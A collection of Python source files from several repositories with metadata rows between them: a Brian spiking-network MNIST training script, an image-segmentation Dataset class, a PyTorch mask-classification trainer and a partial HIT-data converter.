p.dump((j, performances), open(os.path.join(performance_dir, ending + '.p'), 'wb'))
# Save the best model's weights and theta parameters (if so specified)
if save_best_model:
for performance in performances:
if performances[performance][int(j / float(update_interval))] > best_performance:
print '\n', 'Best model thus far! Voting scheme:', performance, '\n'
best_performance = performances[performance][int(j / float(update_interval))]
save_connections(best_weights_dir, connections, input_connections, ending, 'best')
save_theta(best_weights_dir, population_names, neuron_groups, ending, 'best')
np.save(os.path.join(best_assignments_dir, '_'.join(['assignments', ending, 'best'])), assignments)
np.save(os.path.join(best_misc_dir, '_'.join(['accumulated_rates', ending, 'best'])), accumulated_rates)
np.save(os.path.join(best_misc_dir, '_'.join(['spike_proportions', ending, 'best'])), spike_proportions)
# Print out performance progress intermittently
for performance in performances:
print '\nClassification performance (' + performance + ')', performances[performance][1:int(j / float(update_interval)) + 1], \
'\nAverage performance:', sum(performances[performance][1:int(j / float(update_interval)) + 1]) / \
float(len(performances[performance][1:int(j / float(update_interval)) + 1])), \
'\nBest performance:', max(performances[performance][1:int(j / float(update_interval)) + 1]), '\n'
# set input firing rates back to zero
for name in input_population_names:
input_groups[name + 'e'].rate = 0
# run the network for 'resting_time' to relax back to rest potentials
if not reset_state_vars:
b.run(resting_time)
else:
for neuron_group in neuron_groups:
neuron_groups[neuron_group].v = v_reset_e
neuron_groups[neuron_group].ge = 0
neuron_groups[neuron_group].gi = 0
# bookkeeping
input_intensity = start_input_intensity
j += 1
# ensure weights don't grow without bound
normalize_weights()
print '\n'
def run_test():
global fig_num, input_intensity, previous_spike_count, rates, assignments, clusters, cluster_assignments, \
simple_clusters, simple_cluster_assignments, index_matrix, accumulated_rates, \
accumulated_inputs, spike_proportions
# set up performance recording and plotting
num_evaluations = int(num_examples / update_interval) + 1
performances = { voting_scheme : np.zeros(num_evaluations) for voting_scheme in voting_schemes }
num_weight_updates = int(num_examples / weight_update_interval)
all_deltas = np.zeros((num_weight_updates, (conv_size ** 2) * n_e_total))
deltas = np.zeros(num_weight_updates)
# initialize network
j = 0
num_retries = 0
b.run(0)
# get network filter weights
filters = input_connections['XeAe'][:].todense()
# start recording time
start_time = timeit.default_timer()
while j < num_examples:
# get the firing rates of the next input example
rates = (data['x'][j % data_size, :, :] / 8.0) * input_intensity
# sets the input firing rates
input_groups['Xe'].rate = rates.reshape(n_input)
# run the network for a single example time
b.run(single_example_time)
# get count of spikes over the past iteration
current_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e)) - previous_spike_count
previous_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e))
# if the neurons in the network didn't spike more than four times
if np.sum(current_spike_count) < 5 and num_retries < 3:
# increase the intensity of input
input_intensity += 2
num_retries += 1
# set all network firing rates to zero
for name in input_population_names:
input_groups[name + 'e'].rate = 0
# let the network relax back to equilibrium
if not reset_state_vars:
b.run(resting_time)
else:
for neuron_group in neuron_groups:
neuron_groups[neuron_group].v = v_reset_e
neuron_groups[neuron_group].ge = 0
neuron_groups[neuron_group].gi = 0
# otherwise, record results and continue simulation
else:
num_retries = 0
# record the current number of spikes
result_monitor[j % update_interval, :] = current_spike_count
# get true label of the past input example
input_numbers[j] = data['y'][j % data_size][0]
# get the output classifications of the network
for scheme, outputs in predict_label(assignments, result_monitor[j % update_interval, :], accumulated_rates, spike_proportions).items():
if scheme != 'distance':
output_numbers[scheme][j, :] = outputs
elif scheme == 'distance':
current_input = (rates * (weight['ee_input'] / np.sum(rates))).ravel()
output_numbers[scheme][j, 0] = assignments[np.argmin([ euclidean(current_input, \
filters[:, i]) for i in xrange(conv_features) ])]
# print progress
if j % print_progress_interval == 0 and j > 0:
print 'runs done:', j, 'of', int(num_examples), '(time taken for past', print_progress_interval, 'runs:', str(timeit.default_timer() - start_time) + ')'
start_time = timeit.default_timer()
# set input firing rates back to zero
for name in input_population_names:
input_groups[name + 'e'].rate = 0
# run the network for 'resting_time' to relax back to rest potentials
if not reset_state_vars:
b.run(resting_time)
else:
for neuron_group in neuron_groups:
neuron_groups[neuron_group].v = v_reset_e
neuron_groups[neuron_group].ge = 0
neuron_groups[neuron_group].gi = 0
# bookkeeping
input_intensity = start_input_intensity
j += 1
print '\n'
def save_results():
'''
Save results of simulation (train or test)
'''
print '...Saving results'
if not test_mode:
save_connections(end_weights_dir, connections, input_connections, ending, 'end')
save_theta(end_weights_dir, population_names, neuron_groups, ending, 'end')
np.save(os.path.join(end_assignments_dir, '_'.join(['assignments', ending, 'end'])), assignments)
np.save(os.path.join(end_misc_dir, '_'.join(['accumulated_rates', ending, 'end'])), accumulated_rates)
np.save(os.path.join(end_misc_dir, '_'.join(['spike_proportions', ending, 'end'])), spike_proportions)
else:
np.save(os.path.join(activity_dir, '_'.join(['results', str(num_examples), ending])), result_monitor)
np.save(os.path.join(activity_dir, '_'.join(['input_numbers', str(num_examples), ending])), input_numbers)
print '\n'
def evaluate_results():
'''
Evalute the network using the various voting schemes in test mode
'''
global update_interval
test_results = {}
for scheme in voting_schemes:
test_results[scheme] = np.zeros((10, num_examples))
print '\n...Calculating accuracy per voting scheme'
# get network filter weights
filters = input_connections['XeAe'][:].todense()
# for idx in xrange(end_time_testing - end_time_training):
for idx in xrange(num_examples):
label_rankings = predict_label(assignments, result_monitor[idx, :], accumulated_rates, spike_proportions)
for scheme in voting_schemes:
if scheme != 'distance':
test_results[scheme][:, idx] = label_rankings[scheme]
elif scheme == 'distance':
rates = (data['x'][idx % data_size, :, :] / 8.0) * input_intensity
current_input = (rates * (weight['ee_input'] / np.sum(rates))).ravel()
results = np.zeros(10)
results[0] = assignments[np.argmin([ euclidean(current_input, \
filters[:, i]) for i in xrange(conv_features) ])]
test_results[scheme][:, idx] = results
print test_results
differences = { scheme : test_results[scheme][0, :] - input_numbers for scheme in voting_schemes }
correct = { scheme : len(np.where(differences[scheme] == 0)[0]) for scheme in voting_schemes }
incorrect = { scheme : len(np.where(differences[scheme] != 0)[0]) for scheme in voting_schemes }
accuracies = { scheme : correct[scheme] / float(num_examples) * 100 for scheme in voting_schemes }
conf_matrices = np.array([confusion_matrix(test_results[scheme][0, :], \
input_numbers) for scheme in voting_schemes])
np.save(os.path.join(results_path, '_'.join(['confusion_matrix', ending]) + '.npy'), conf_matrices)
print '\nConfusion matrix:\n\n', conf_matrices
for scheme in voting_schemes:
print '\n-', scheme, 'accuracy:', accuracies[scheme]
results = pd.DataFrame([ [ ending ] + accuracies.values() ], columns=[ 'Model' ] + accuracies.keys())
filename = '_'.join([str(conv_features), 'results.csv'])
if not filename in os.listdir(results_path):
results.to_csv(os.path.join(results_path, filename), index=False)
else:
all_results = pd.read_csv(os.path.join(results_path, filename))
all_results = pd.concat([all_results, results], ignore_index=True)
all_results.to_csv(os.path.join(results_path, filename), index=False)
print '\n'
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--mode', default='train', help='Network operating mode: \
"train" mode learns the synaptic weights of the network, and \
"test" mode holds the weights fixed / evaluates accuracy on test data.')
parser.add_argument('--conv_size', type=int, default=28, help='Side length of the square convolution \
window used by the input -> excitatory layer of the network.')
parser.add_argument('--conv_stride', type=int, default=0, help='Horizontal, vertical stride \
of the convolution window used by input layer of the network.')
parser.add_argument('--conv_features', type=int, default=100, help='Number of excitatory \
convolutional features / filters / patches used in the network.')
parser.add_argument('--do_plot', type=str, default='False', help='Whether or not to display plots during network \
training / testing. Defaults to False, as this makes the \
network operation speedier, and possible to run on HPC resources.')
parser.add_argument('--num_train', type=int, default=10000, help='The number of \
examples for which to train the network on.')
parser.add_argument('--num_test', type=int, default=10000, help='The number of \
examples for which to test the network on.')
parser.add_argument('--random_seed', type=int, default=0, help='The random seed \
(any integer) from which to generate random numbers.')
parser.add_argument('--save_weights', type=str, default='False', help='Whether or not to \
save the weights of the model every `weight_update_interval`.')
parser.add_argument('--weight_update_interval', type=int, default=10, help='How often \
to update the plot of network filter weights.')
parser.add_argument('--save_best_model', type=str, default='True', help='Whether \
to save the current best version of the model.')
parser.add_argument('--update_interval', type=int, default=250, help='How often \
to update neuron labels and classify new inputs.')
parser.add_argument('--plot_all_deltas', type=str, default='False', help='Whether or not to \
plot weight changes for all neurons from input to excitatory layer.')
parser.add_argument('--train_remove_inhibition', type=str, default='False', help='Whether or not to \
remove lateral inhibition during the training phase.')
parser.add_argument('--test_no_inhibition', type=str, default='False', help='Whether or not to \
remove lateral inhibition during the test phase.')
parser.add_argument('--test_max_inhibition', type=str, default='False', help='Whether or not to \
use ETH-style inhibition during the test phase.')
parser.add_argument('--start_inhib', type=float, default=0.1, help='The beginning value \
of inhibiton for the increasing scheme.')
parser.add_argument('--max_inhib', type=float, default=17.4, help='The maximum synapse \
weight for inhibitory to excitatory connections.')
parser.add_argument('--reset_state_vars', type=str, default='False', help='Whether to \
reset neuron / synapse state variables or run a "reset" period.')
parser.add_argument('--inhib_update_interval', type=int, default=250, \
help='How often to increase the inhibition strength.')
parser.add_argument('--inhib_schedule', type=str, default='linear', help='How to \
update the strength of inhibition as the training progresses.')
parser.add_argument('--save_spikes', type=str, default='False', help='Whether or not to \
save 2D graphs of spikes to later use to make an activity time-lapse.')
parser.add_argument('--normalize_inputs', type=str, default='False', help='Whether or not \
to ensure all inputs contain the same amount of "ink".')
parser.add_argument('--proportion_low', type=float, default=0.5, help='What proportion of \
the training to grow the inhibition from "start_inhib" to "max_inhib".')
parser.add_argument('--noise_const', type=float, default=0.0, help='The scale of the \
noise added to input examples.')
parser.add_argument('--inhib_scheme', type=str, default='increasing', help='How inhibition from \
inhibitory to excitatory neurons is handled.')
parser.add_argument('--weights_noise', type=str, default='False', help='Whether to use multiplicative \
Gaussian noise on synapse weights on each iteration.')
parser.add_argument('--weights_noise_constant', type=float, default=1e-2, help='The spread of the \
Gaussian noise used on synapse weights ')
parser.add_argument('--start_input_intensity', type=float, default=2.0, help='The intensity at which the \
input is (default) presented to the network.')
parser.add_argument('--test_adaptive_threshold', type=str, default='False', help='Whether or not to allow \
neuron thresholds to adapt during the test phase.')
parser.add_argument('--train_time', type=float, default=0.35, help='How long training \
inputs are presented to the network.')
parser.add_argument('--train_rest', type=float, default=0.15, help='How long the network is allowed \
to settle back to equilibrium between training examples.')
parser.add_argument('--test_time', type=float, default=0.35, help='How long test \
inputs are presented to the network.')
parser.add_argument('--test_rest', type=float, default=0.15, help='How long the network is allowed \
to settle back to equilibrium between test examples.')
parser.add_argument('--dt', type=float, default=0.25, help='Integration time step in milliseconds.')
# parse arguments and place them in local scope
args = parser.parse_args()
args = vars(args)
locals().update(args)
print '\nOptional argument values:'
for key, value in args.items():
print '-', key, ':', value
print '\n'
for var in [ 'do_plot', 'plot_all_deltas', 'reset_state_vars', 'test_max_inhibition', \
'normalize_inputs', 'save_weights', 'save_best_model', 'test_no_inhibition', \
'save_spikes', 'weights_noise', 'test_adaptive_threshold' ]:
if locals()[var] == 'True':
locals()[var] = True
elif locals()[var] == 'False':
locals()[var] = False
else:
raise Exception('Expecting True or False-valued command line argument "' + var + '".')
# test or training mode
test_mode = mode == 'test'
if test_mode:
num_examples = num_test
else:
num_examples = num_train
if test_mode:
data_size = 10000
else:
data_size = 60000
# At which iteration do we increase the inhibition to the ETH level?
increase_iter = int(num_train * proportion_low)
# set brian global preferences
b.set_global_preferences(defaultclock = b.Clock(dt=dt*b.ms), useweave = True, gcc_options = ['-ffast-math -march=native'], usecodegen = True,
usecodegenweave = True, usecodegenstateupdate = True, usecodegenthreshold = False, usenewpropagate = True, usecstdp = True, openmp = False,
magic_useframes = False, useweave_linear_diffeq = True)
# for reproducibility's sake
np.random.seed(random_seed)
start = timeit.default_timer()
data = get_labeled_data(os.path.join(MNIST_data_path, 'testing' if test_mode else 'training'),
not test_mode, False, xrange(10), 1000, normalize_inputs)
print 'Time needed to load data:', timeit.default_timer() - start
# set parameters for simulation based on train / test mode
record_spikes = True
# number of inputs to the network
n_input = 784
n_input_sqrt = int(math.sqrt(n_input))
# number of neurons parameters
if conv_size == 28 and conv_stride == 0:
n_e = 1
else:
n_e = ((n_input_sqrt - conv_size) / conv_stride + 1) ** 2
n_e_total = n_e * conv_features
n_e_sqrt = int(math.sqrt(n_e))
n_i = n_e
features_sqrt = int(math.ceil(math.sqrt(conv_features)))
# time (in seconds) per data example presentation and rest period in between
if not test_mode:
single_example_time = train_time * b.second
resting_time = train_rest * b.second
else:
single_example_time = test_time * b.second
resting_time = test_rest * b.second
# set the update interval
if test_mode:
update_interval = num_examples
# weight updates and progress printing intervals
print_progress_interval = 10
# rest potential parameters, reset potential parameters, threshold potential parameters, and refractory periods
v_rest_e, v_rest_i = -65. * b.mV, -60. * b.mV
v_reset_e, v_reset_i = -65. * b.mV, -45. * b.mV
v_thresh_e, v_thresh_i = -52. * b.mV, -40. * b.mV
refrac_e, refrac_i = 5. * b.ms, 2. * b.ms
# dictionaries for weights and delays
weight, delay = {}, {}
# populations, connections, saved connections, etc.
input_population_names = [ 'X' ]
population_names = [ 'A' ]
input_connection_names = [ 'XA' ]
save_conns = [ 'XeAe', 'AeAe' ]
# weird and bad names for variables, I think
input_conn_names = [ 'ee_input' ]
recurrent_conn_names = [ 'ei', 'ie', 'ee' ]
# setting weight, delay, and intensity parameters
weight['ee_input'] = (conv_size ** 2) * 0.099489796
delay['ee_input'] = (0 * b.ms, 10 * b.ms)
delay['ei_input'] = (0 * b.ms, 5 * b.ms)
input_intensity = start_input_intensity
current_inhibition = 1.0
# time constants, learning rates, max weights, weight dependence, etc.
tc_pre_ee, tc_post_ee = 20 * b.ms, 20 * b.ms
nu_ee_pre, nu_ee_post = 0.0001, 0.01
nu_AeAe_pre, nu_Ae_Ae_post = 0.1, 0.5
wmax_ee = 1.0
exp_ee_post = exp_ee_pre = 0.2
w_mu_pre, w_mu_post = 0.2, 0.2
# setting up differential equations (depending on train / test mode)
if test_mode and not test_adaptive_threshold:
scr_e = 'v = v_reset_e; timer = 0*ms'
else:
tc_theta = 1e7 * b.ms
theta_plus_e = 0.05 * b.mV
scr_e = 'v = v_reset_e; theta += theta_plus_e; timer = 0*ms'
offset = 20.0 * b.mV
v_thresh_e = '(v>(theta - offset + ' + str(v_thresh_e) + ')) * (timer>refrac_e)'
# equations for neurons
neuron_eqs_e = '''
dv/dt = ((v_rest_e - v) + (I_synE + I_synI) / nS) / (100 * ms) : volt
I_synE = ge * nS * -v : amp
I_synI = gi * nS * (-100.*mV-v) : amp
dge/dt = -ge/(1.0*ms) : 1
dgi/dt = -gi/(2.0*ms) : 1
'''
if test_mode:
neuron_eqs_e += '\n theta :volt'
else:
neuron_eqs_e += '\n dtheta/dt = -theta / (tc_theta) : volt'
neuron_eqs_e += '\n dtimer/dt = 100.0 : ms'
neuron_eqs_i = '''
dv/dt = ((v_rest_i - v) + (I_synE + I_synI) / nS) / (10*ms) : volt
I_synE = ge * nS * -v : amp
I_synI = gi * nS * (-85.*mV-v) : amp
dge/dt = -ge/(1.0*ms) : 1
dgi/dt = -gi/(2.0*ms) : 1
'''
# STDP synaptic traces
eqs_stdp_ee = '''
dpre/dt = -pre / tc_pre_ee : 1.0
dpost/dt = -post / tc_post_ee : 1.0
'''
eqs_stdp_AeAe = '''
dpre/dt = -pre / tc_pre_ee : 1.0
dpost/dt = -post / tc_post_ee : 1.0
'''
# STDP rule (post-pre, no weight dependence)
eqs_stdp_pre_ee = 'pre = 1.; w -= nu_ee_pre * post'
eqs_stdp_post_ee = 'w += nu_ee_post * pre; post = 1.'
eqs_stdp_pre_AeAe = 'pre += 1.; w -= nu_AeAe_pre * post'
eqs_stdp_post_AeAe = 'w += nu_AeAe_post * pre; post += 1.'
print '\n'
# set ending of filename saves
ending = '_'.join([ str(conv_size), str(conv_stride), str(conv_features), str(n_e), \
str(num_train), str(random_seed), str(proportion_low), \
str(start_inhib), str(max_inhib) ])
b.ion()
fig_num = 1
# creating dictionaries for various objects
neuron_groups, input_groups, connections, input_connections, stdp_methods, \
rate_monitors, spike_monitors, spike_counters, output_numbers = {}, {}, {}, {}, {}, {}, {}, {}, {}
# creating convolution locations inside the input image
convolution_locations = {}
for n in xrange(n_e):
convolution_locations[n] = [ ((n % n_e_sqrt) * conv_stride + (n // n_e_sqrt) * n_input_sqrt * \
conv_stride) + (x * n_input_sqrt) + y for y in xrange(conv_size) for x in xrange(conv_size) ]
# instantiating neuron "vote" monitor
result_monitor = np.zeros((update_interval, conv_features, n_e))
# bookkeeping variables
previous_spike_count = np.zeros((conv_features, n_e))
input_numbers = np.zeros(num_examples)
rates = np.zeros((n_input_sqrt, n_input_sqrt))
if test_mode:
assignments = np.load(os.path.join(best_assignments_dir, '_'.join(['assignments', ending, 'best.npy'])))
accumulated_rates = np.load(os.path.join(best_misc_dir, '_'.join(['accumulated_rates', ending, 'best.npy'])))
spike_proportions = np.load(os.path.join(best_misc_dir, '_'.join(['spike_proportions', ending, 'best.npy'])))
else:
assignments = -1 * np.ones((conv_features, n_e))
# build the spiking neural network
build_network()
if test_mode:
voting_schemes = ['all', 'all_active', 'most_spiked_patch', 'most_spiked_location', 'confidence_weighting', \
'activity_neighborhood', 'most_spiked_neighborhood', 'distance']
else:
voting_schemes = ['all', 'all_active', 'most_spiked_patch', 'most_spiked_location', \
'confidence_weighting', 'activity_neighborhood', 'most_spiked_neighborhood']
for scheme in voting_schemes:
output_numbers[scheme] = np.zeros((num_examples, 10))
if not test_mode:
accumulated_rates = np.zeros((conv_features * n_e, 10))
accumulated_inputs = np.zeros(10)
spike_proportions = np.zeros((conv_features * n_e, 10))
# run the simulation of the network
if test_mode:
run_test()
else:
run_train()
# save and plot results
save_results()
# evaluate results
if test_mode:
evaluate_results()
|
[
"[email protected]"
] | |
2ac03ec918444160ad766c68aebfd92c369595f2
|
b7fbe103e03573cc7ac2d1c6f2d150377601f632
|
/dataset.py
|
c1b8ac03ef93e850adcab4d7e419613b8f3e0456
|
[] |
no_license
|
fortis3000/blob_detection
|
294736ab7befe6993fc5852ec35f193be434ead5
|
5b0d5adf86cfa0b41dd7e53d00dfff8dbb82fd13
|
refs/heads/master
| 2023-02-20T17:57:36.252672 | 2021-01-18T13:56:14 | 2021-01-18T13:56:14 | 330,676,190 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,818 |
py
|
"""
Bulk dataset module
"""
import os
import cv2
import matplotlib.pyplot as plt
import numpy as np
class Dataset:
"""
Bulk dataset Dataset.
Reads images, apply augmentation and preprocessing transformations.
Args:
images_dir (str): path to images folder
masks_dir (str): path to segmentation masks folder
classes (list): values of classes to extract from segmentation mask
augmentation (albumentations.Compose): data transfromation pipeline
(e.g. flip, scale, etc.)
preprocessing (albumentations.Compose): data preprocessing
(e.g. noralization, shape manipulation, etc.)
Example:
dataset = Dataset(image_folder, masks+folder, classes=['bulk'])
"""
CLASSES = ["bulk"]
def __init__(
self,
images_dir: str,
masks_dir: str,
classes=None,
augmentations=None,
preprocessing=None,
):
self.ids = os.listdir(images_dir)
self.images_fps = [
os.path.join(images_dir, image_id) for image_id in self.ids
]
self.masks_fps = [
os.path.join(masks_dir, mask_id) for mask_id in self.ids
]
self.class_values = [self.CLASSES.index(c.lower()) + 1 for c in classes]
self.augmentations = augmentations
self.preprocessing = preprocessing
def __getitem__(self, item):
# read data
image = cv2.imread(self.images_fps[item])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
mask = cv2.imread(self.masks_fps[item], 0)
assert mask is not None, (
f"Mask can't be readed,"
f" mask: {self.masks_fps[item]},"
f" image: {self.images_fps[item]}"
)
mask //= 255
# extract class from mask
masks = [(mask == v) for v in self.class_values]
mask = np.stack(masks, axis=-1).astype("float")
# add background if mask is not binary
if mask.shape[-1] != 1:
background = 1 - mask.sum(axis=-1, keepdims=True)
mask = np.concatenate((mask, background), axis=-1)
# apply augmentations
if self.augmentations:
sample = self.augmentations(image=image, mask=mask)
image, mask = sample["image"], sample["mask"]
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=image, mask=mask)
image, mask = sample["image"], sample["mask"]
return image, mask
def __len__(self):
return len(self.ids)
def visualize(save_name: str = None, **images):
"""Plots images in one row"""
n = len(images)
plt.figure(figsize=(16, 5))
for i, (name, image) in enumerate(images.items()):
plt.subplot(1, n, i + 1)
plt.xticks([])
plt.yticks([])
plt.title(" ".join(name.split("_")).title())
# do not work with colab
if image.shape[-1] == 1:
plt.imshow(image.squeeze(-1))
else:
plt.imshow(image)
if save_name:
plt.savefig(save_name)
plt.close()
def denormalize(x):
"""Scale image to range 0..1 for correct plot"""
x_max = np.percentile(x, 98)
x_min = np.percentile(x, 2)
x = (x - x_min) / (x_max - x_min)
x = x.clip(0, 1)
return x
if __name__ == "__main__":
data_path = os.path.join("data", "raw")
dataset = Dataset(
images_dir=os.path.join(data_path, "val"),
masks_dir=os.path.join(data_path, "val_masks"),
classes=["bulk"],
augmentations=None,
preprocessing=None,
)
for i in range(20):
image, mask, _ = dataset[i]
print(image.shape)
print(mask.shape)
visualize(image=image, bulk_mask=mask)
print(_)
|
[
"[email protected]"
] | |
4e4423d83f7f75ce347ed72f5eb755161c853971
|
0938dfe5cd7678bc1fa5060019b944d3d7f319d6
|
/Trainer.py
|
26f95e2fad53db1befbc5e535967399c64896476
|
[] |
no_license
|
joon1230/Mask_Detection
|
04e4a0fb2999f79c1360435feffafb99bf9789c2
|
65cf464c6880afd4f88535628831577d1c5fae90
|
refs/heads/main
| 2023-06-02T02:31:10.620322 | 2021-06-18T03:38:35 | 2021-06-18T03:38:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,209 |
py
|
import os
import pandas as pd
import time
from functools import partial
import glob
import numpy as np
import torch
import torch.optim
from torch.utils.data import Dataset, DataLoader
from sklearn.metrics import f1_score
from sklearn.model_selection import train_test_split
import utils
import Datasets
class Trainer():
def __init__(self, model, model_name, transform, dataset, optimizer, learning_rate, weight_decay, batch_size,
train_ratio, loss_function, epoch, input_size, nick_name, load_size=None, scheduler=None):
self.model = model()
self.dataset = partial(dataset, transform = transform, size = load_size)
self.val_dataset = partial(Datasets.MaskDataset, transform=Datasets.transform_test(input_size=input_size))
self.learning_rate = learning_rate
self.weight_decay = weight_decay
self.train_ratio = train_ratio
self.batch_size = batch_size
self.train_test_split()
self.epoch = epoch
self.optimizer = optimizer(self.model.parameters(), lr=self.learning_rate, weight_decay=self.weight_decay)
self.scheduler = scheduler(optimizer=self.optimizer)
self.criterion = loss_function
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
self.model.to(self.device)
self.log = f"""| model_name : {model_name} | load_size : {load_size} | input_size : {input_size} | batch : {batch_size} |\n| train_people : {len(self.train_paths)} , val_people : {len(self.val_paths)} \n| loss function : {loss_function}\n| optimizer : {optimizer} | weight_decay : {weight_decay} | learning_rate : {learning_rate} \n| transform : {transform} """
self.save_path = f'{model_name}/{optimizer}/{model_name + nick_name}'
print(self.log)
def train(self):
for i in range(1, self.epoch + 1):
self.train_one_epoch(i)
if 1 - self.train_ratio:
self.test_one_epoch(i)
self.save_model(i, name='epoch', save_path=self.save_path)
if not (1 - self.train_ratio):
self.save_model(i, name='epoch', save_path=self.save_path)
def train_one_epoch(self, epoch):
self.model.train()
train_loss = 0
correct = 0
total = 0
load_time = 0
inference_time = 0
f1_score = 0
self.log += f"\n\n====train model epoch : {epoch}====\n"
print(f"\n\n====train model epoch : {epoch}====")
start_time = time.time()
for batch_idx, (inputs, labels) in enumerate(self.train_loader):
inputs, labels = inputs.to(self.device), labels.to(self.device)
s = time.time()
self.optimizer.zero_grad() # 각각의 모델 파라미터 안의 gradient가 update 된다.
outputs = self.model(inputs)
loss = self.criterion(outputs, labels)
loss.backward()
self.optimizer.step()
if self.scheduler:
self.scheduler.step()
train_loss += loss.item()
_, predicted = outputs.max(1)
total += labels.size(0)
correct += predicted.eq(labels).sum().item()
f1_score += self.f1_score(predicted, labels)
inference_time += time.time() - s
load_time = time.time() - start_time - inference_time
if batch_idx % 10 == 0:
self.log += "batch : %.3d | Loss: %.3f | Acc : %.3f%% | f1_score : %.3f%% | inference_time : %.3f / load_time : %.3f \n" \
% (
batch_idx, train_loss / (batch_idx + 1), 100. * correct / total, f1_score / (batch_idx + 1),
inference_time / (batch_idx + 1), load_time / (batch_idx + 1e-04))
print(
"batch : %.3d | Loss: %.3f | Acc : %.3f%% | f1_score : %.3f%% | inference_time : %.3f / load_time : %.3f \r" \
% (batch_idx, train_loss / (batch_idx + 1), 100. * correct / total, f1_score / (batch_idx + 1),
inference_time / (batch_idx + 1), load_time / (batch_idx + 1e-04)), end="")
def test_one_epoch(self, epoch):
self.model.eval()
test_loss = 0
correct = 0
total = 0
f1_score = 0
print()
print(f"====Evaluation model epoch : {epoch}====")
with torch.no_grad():
for batch_idx, (inputs, labels) in enumerate(self.val_loader):
inputs, labels = inputs.to(self.device), labels.to(self.device)
outputs = self.model(inputs)
loss = self.criterion(outputs, labels)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += labels.size(0)
correct += predicted.eq(labels).sum().item()
f1_score += self.f1_score(predicted, labels)
print(f"progress:{batch_idx * self.batch_size} | {len(self.val_paths)} \r", end="")
self.log += f'Accuracy of the network on the {total} test image : %d %% | f1_score : %.3f %%' % (
100 * correct / total, f1_score / (batch_idx))
print(f'Accuracy of the network on the {total} test image : %d %% | f1_score : %.3f %%' % (
100 * correct / total, f1_score / (batch_idx)))
def save_model(self, epoch, save_path, name='student'):
print(f'saved model {save_path}')
if not os.path.exists(save_path):
os.makedirs(save_path)
file_name = f"{name}_{epoch}.pth"
file_path = os.path.join(save_path, file_name)
torch.save(self.model.state_dict(), file_path)
with open(f'{save_path}/log.txt', 'w') as f:
f.write(self.log)
return None
def train_test_split(self):
meta_data = pd.read_csv('../input/data/train/train.csv')
if 1 - self.train_ratio:
meta_data['cls'] = meta_data.path.map(self.get_person_class)
train_paths, val_paths = train_test_split(meta_data, train_size=self.train_ratio, stratify=meta_data['cls'])
self.train_paths, self.val_paths = train_paths.path.values, val_paths.path.values
self.train_loader = DataLoader(self.dataset(dir_paths=self.train_paths), batch_size=self.batch_size,
shuffle=True, num_workers=4)
self.val_loader = DataLoader(self.val_dataset(dir_paths=self.val_paths), batch_size=self.batch_size,
shuffle=True, num_workers=4)
else:
self.train_paths, self.val_paths = list(meta_data.path.values), []
self.train_loader = DataLoader(self.dataset(dir_paths=self.train_paths), batch_size=self.batch_size,
shuffle=True, num_workers=4)
def f1_score(self, y_pred, target):
y_pred, target = np.asarray(y_pred.to('cpu')), np.asarray(target.to('cpu'))
return f1_score(y_pred, target, average='macro')
def get_person_class(self, data):
gender = utils.get_gender_logit(data)
age_cls = utils.get_age_class(data.split('_')[-1])
return gender*3 + age_cls
|
[
"[email protected]"
] | |
8d49dfba348dc525114f8c35b0b4eaa0c06bf9fd
|
0427eeafe5dfa0d25a88c535e16f2c5c566f7ebf
|
/Expression/separator.py
|
c656696079f48ab02d77130c74e3c754784d4bde
|
[] |
no_license
|
balujaashish/NOW_PDF_Reader
|
86d653536317d064ebbe40e9a3b5c9233fd95b9a
|
f6cba94f034352e2c7287e98bdbb89a9baa7cfe6
|
refs/heads/master
| 2021-03-31T15:17:37.169832 | 2020-06-16T05:53:12 | 2020-06-16T05:53:12 | 248,115,613 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 83 |
py
|
class Separator():
def __init__(self):
self.separators = ['=', ':']
|
[
"[email protected]"
] | |
f1babe1d7b57929d0c33a6a71de633682880da6e
|
2d2b25484e96753891554df3d1f3ea86e5df2bd2
|
/hits/__init__.py
|
5479b058039073cbf7d4528c1fda0c74a8fad336
|
[] |
no_license
|
maxzuo/HITSystem
|
83d8539c9dd5916a7952c9d5f647ace8b12382b2
|
943ba5c1d17df79b1f6f346cfdefcaab8d5bc2ec
|
refs/heads/master
| 2020-04-23T22:59:41.921050 | 2019-04-19T21:38:09 | 2019-04-19T21:38:09 | 171,520,452 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,538 |
py
|
import sys
import os
from datetime import datetime
import convert
__version__ = "0.1.0"
# class __Converter:
# def __init__(self):
# # self.
# return
# #Converts HIT src to tsv using key and saving it to dest
# def raw2tsv(self, src, key, dest, verbose=False):
# now = datetime.now()
# if (not os.path.isfile(src)):
# raise Exception("The provided source filepath is not a file: %s" % src)
# if (not os.path.isfile(key)):
# raise Exception("The provided key filepath is not a file: %s" % src)
# #Retrieve and process raw data. Hardcoding to ignore the first 5 lines
# #and the 7th line (not important)
# raw = process(readLines(src))
# #Printing metadata deleted when processing the file
# os.system("clear")
# print "Raw File:\t\t\t\t%s\n\nMetadata:\n" %src, reduce(lambda x,y: "\n".join([x,y]),
# map(lambda x: "\r\t\t\t\t\t".join(x), raw[:5]))
# matrix = raw[5:]
# matrix.pop(1)
# #calculating columns and rows so the resulting matrix will be rectangular
# cols = max([len(line) for line in matrix])
# rows = len(matrix)
# #recreating tsv as a matrix. Not completely necessary
# for line in matrix:
# while len(line) < cols:
# line.append("")
# #Retrieve keys and store in a dictionary
# # print matrix[0]
# keys = self.__process(readLines(key))
# keyDict = {}
# for key in keys:
# keyDict[key[1]] = key[0]
# #Array tagged used to remember indices of desired elements
# tagged = []
# for i in xrange(cols):
# try:
# matrix[0][i] = keyDict[matrix[0][i]]
# tagged.append(i)
# except:
# pass
# #Write new file at destinated file path
# with open(dest, "w") as destFile:
# for i in xrange(rows):
# line = []
# for j in xrange(cols):
# if j == 0 or j in tagged:
# line.append(matrix[i][j])
# destFile.write("\t".join(line) + "\n")
# print "\n\nProcessed file saved at:\t\t%s\n" % dest
# if verbose:
# print "Conversion took\t\t\t\t%s\n" % str(datetime.now() - now)
# #Wrapper function to open, read, and then close a file
# #Returns an array of lines
# def __readLines(self, src):
